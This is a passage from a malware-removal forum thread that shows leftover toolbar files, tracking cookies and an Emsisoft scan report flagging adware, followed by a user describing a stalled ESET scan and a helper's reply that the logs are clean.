   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\54E1F30D25BD6619F79ACF6A870AE4E7 (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\55E9C9C5334082B348280577C80C31BD (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\5E3CD8A9BEB80E3BFD0FEA2B548696C0 (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\6083B4001405A3DCD6A4D83137E89FDA (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\653C9640D7C298E229BBC80EBAA2AF1D (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\673F69471188DF744651EEFE7B0B5FB5 (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\6CE0D1C4164244C113E96F1268A9846E (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\71394D2303FF3351CD5897DDCB68BFA7 (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\86E8FCE7FFF5084DB0B1E058C8C0F157 (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\8846A71A4401002D49155C2A022B810B (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\8DF4FC822594D19D62ABC77C9F9287BF (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\A581B0FDD98750E0A6243ACFD28C1B43 (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\C80525380148CE2E3389CA1109733E5C (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\D028D9A36456F6BB75B1208218BD862A (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\D961DCC29095A4EE7C6D8AF0A1A9F1C6 (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\E6E312ACAD7164BC029529BA09E416C9 (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\filelist (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Data\default\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Data\default\feed4.data (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Data\default\us_p_c.data (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Data\default\us_sres.data (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Data\default\us_yb_c.data (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\bkm_add_2_s0.gif (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\e\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\e\finance_r.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\e\flickr_refresh2.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\e\mail_refresh_new_s0.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\e\mail_refresh_new_s1.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\food_png.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\app_hover_2014.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\arrow-app-2.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\arrow-app-2_h.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\arrow-app-2_p.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\bookmarks_r_s0.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\bookmarks_r_s1.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\droparrow.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\droparrow_h.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\h_1.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\new-yahoo-logo.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\news_refresh_new.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\ylive_s0.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\horoscope.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\movies_png.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\rss_metro12_1.gif (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\tech_png.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\visi\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\visi\tb_coup2_s0.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo!\Companion\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo!\Companion\data (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo!\Companion\resources (YahooToolbar)
   HKLM\SOFTWARE\Classes\f\ (Funmoods)
   HKLM\SOFTWARE\Conduit\ (Conduit)
 
Cookies _____________________________________________________________________
 
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:254a.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:abmr.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:ad.360yield.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:adaptv.advertising.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:adbrn.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:addthis.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:adform.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:adgrx.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:adhigh.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:adingo.jp
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:adnxs.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.avocet.io
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.creative-serving.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.pubmatic.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.servebom.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.stickyadstv.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:adsrvr.org
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:adsymptotic.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:adtechus.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:advertising.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:agkn.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:angsrvr.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:atdmt.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:atemda.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:basebanner.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:bidr.io
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:bidswitch.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:bizrate.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:bluekai.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:bs.serving-sys.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:c.appier.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:casalemedia.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:chango.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:connexity.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:contextweb.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:crwdcntrl.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:d.adroll.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:demdex.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:domdex.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:dotomi.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:doubleclick.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:dpm.demdex.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:dsp.linksynergy.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:everesttech.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:eyereturn.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:eyeviewads.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:flashtalking.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:go.sonobi.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:googleadservices.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:gssprt.jp
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:gwallet.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:ib.mookie1.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:imrworldwide.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:ipredictive.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:korrelate.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:krxd.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:legolas-media.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:lijit.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:link.krxd.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:linksynergy.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:match.adsby.bidtheatre.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:match.rundsp.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:mathtag.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:media6degrees.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:mediaplex.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:ml314.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:mookie1.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:mxptint.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:nexac.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:openx.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:optimatic.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:owneriq.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:pixel-a.sitescout.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:pixel.rubiconproject.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:pixel.sitescout.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:postrelease.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:pubmatic.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:revsci.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:rfihub.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:rlcdn.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:ru4.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:rubiconproject.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:scorecardresearch.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:serving-sys.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:simpli.fi
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:sitescout.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:skimresources.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:smartadserver.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:sxp.smartclip.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:taboola.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:tap-secure.rubiconproject.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:tap.rubiconproject.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:tapad.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:tidaltv.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:tremorhub.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:tribalfusion.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:tubemogul.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:turn.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:univide.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:vindicosuite.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:virool.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:visualdna.com
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:w55c.net
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:weborama.fr
   C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Cookies:wtp101.com
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\0G3N7UXS.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\0WYDJGEN.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\12TRYY11.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\15FL8PCD.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\2QZB0FGT.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\2ZO7S98J.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\3D4RSWY7.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\3NOYW3TH.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\3NWSJ87A.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\3U17ILYF.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\4A1K6HJ1.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\4DE8NU07.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\5HZ2V8C7.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\66DYK9PS.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\6CKGLK6Q.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\6F990279.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\6J44Y0VY.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\6MN9CH1E.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\7HU635YR.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\7UB16BXB.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\8WQL1YLX.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\8Z8RJQRO.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\A9HHAKUF.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\AAEQ7C9V.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\B1GQYLBY.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\B2JDR166.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\BXH9MSPO.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\CFH3LSUV.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\D8VTFSN2.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\DSII6S9S.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\DYMNQZS2.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\E08VJS9A.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\E113V5YI.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\E54PQ9AM.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\EGSH4TGG.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\F5FDANVZ.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\GKHY0GBI.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\HTYBJB03.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\IA9X62BX.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\IT5WA9B3.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\K3IBH98E.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\KIKE354T.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\KMBQRKTF.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\KPGCKVAY.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\L8H0Y0Q5.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\LE868OZY.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\LLBTVVPN.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\M5E32KCD.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\MKVDTZOW.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\ML9AXD96.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\N34ZO9WG.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\N3FIZXQM.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\NF9VRHLO.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\NOML1TTR.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\OBFJZDMS.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\OG3SY5A7.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\OHLKSAQT.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\P19565FG.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\PCJOFOBX.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\QFVGEKAW.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\QJB7E6PV.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\QOJUII5F.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\R3X9N8D2.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\RLK17DN1.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\RRTW09HV.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\RVLJLTNG.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\RWLT3FFL.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\SEKWLUU2.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\U33ABFV3.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\U9DFHNIJ.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\UGW76SFA.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\V0R488SH.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\VB90CLK7.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\VIAK73W9.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\VJLZ5NMP.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\VN8QQUIB.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\W0Y6QD3W.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\WJ9OOBWN.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\XDUWKO3N.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\XU3F3B3F.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\YP17NFK0.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\ZJMEE8A9.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\ZK5KKC0I.cookie
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\ZMGEHQRV.cookie
   C:\Users\User\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\7MX565TV.cookie
   C:\Users\User\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\G57VN49V.cookie
 
 
 
Emsisoft Emergency Kit - Version 2017.2
Last update: 3/14/2017 4:21:33 PM
User account: CINDI-HP\User
Computer name: CINDI-HP
OS version: Windows 10x64 
 
Scan settings:
 
Scan type: Custom Scan
Objects: Rootkits, Memory, Traces, C:\
 
Detect PUPs: On
Scan archives: On
ADS Scan: On
File extension filter: Off
Direct disk access: Off
 
Scan start: 3/14/2017 4:24:32 PM
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CONDUIT detected: Application.InstallAd (A) [270275]
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\F detected: Application.AdReg (A) [271742]
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\F detected: Application.AdReg (A) [271742]
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CONDUIT detected: Application.InstallAd (A) [270275]
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\F detected: Application.AdReg (A) [271742]
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\F detected: Application.AdReg (A) [271742]
C:\Program Files (x86)\Freemake\Freemake Video Converter\SetupUpdate.exe detected: Application.AdLoad (A) [282988]
C:\Users\User\Downloads\Andy_46.16_58.exe detected: Application.AdInstall (A) [285134]
C:\Users\User\Downloads\CouponPrinter.exe detected: Application.AdOffer (A) [285399]
C:\Users\User\Downloads\CouponPrinterCPS.exe detected: Application.AdOffer (A) [285399]
C:\Users\User\Downloads\cpu-z_1.64-setup-en.exe -> (Instyler o) -> (Instyler Module 5) detected: Application.Toolbar (A) [282788]
C:\Users\User\Downloads\PublicTransportSetup.exe detected: Application.InstallBox (A) [281859]
C:\Users\User\Downloads\YTD Video Downloader Pro 5.1.1.0.1 Incl Patch.zip -> YTD Video Downloader Pro 5.1.1.0.1 Incl Patch/YTDSetup.exe -> (NSIS o) -> lzma_solid_nsis0007 detected: Application.Toolbar (A) [282788]
C:\Users\User\Downloads\YTD Video Downloader Pro 5.1.1.0.1 Incl Patch\YTD Video Downloader Pro 5.1.1.0.1 Incl Patch\YTDSetup.exe -> (NSIS o) -> lzma_solid_nsis0007 detected: Application.Toolbar (A) [282788]
 
Scanned 457371
Found 14
 
Scan end: 3/14/2017 6:11:55 PM
Scan time: 1:47:23
 
I just re-read your instructions and noticed that I neglected to turn off my antivirus (windows defender) prior to running the ESET Online scan. I tried to stop the scan, hoping that it would trigger the application to finish the scan so I could at least view the results. (note: It had found 32 infections so far) Even after a lengthy wait, It wouldnt stop scanning though it did say that STOP SCAN was initiated. So I used Task Manager to stop the scan, but no results were available. I then disabled the antivirus and ran it again. Hopefully it won't take as long but as soon as it does, I will post results. 

Edited by captivekangaroo, 15 March 2017 - 03:00 PM.


#14 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:06:35 PM

Posted 15 March 2017 - 06:29 PM

Hi,

 

Thank you for the update. The logs are clean and the detected files are safe as long you are careful with the check boxes that appear during the install and to avoid installing of unwanted applications or toolbars. You can install Unchecky to make sure that the check boxes will remain clean when you install new software.

 

Let me see the last log and then I can post my final advice. :)

 

 

Regards,

Georgi


cXfZ4wS.png


#15 captivekangaroo

captivekangaroo
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:35 AM

Posted 16 March 2017 - 11:40 AM

Georgi, 

The ESET scan is still running (21 hours 35 min.) but once again its stuck on one file. It says 32 files infected, 453,955 files scanned. That file number has not changed in 15 hours. I am going to try stopping it again and see if it will generate a log. Is this ok? I'll wait for your reply.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users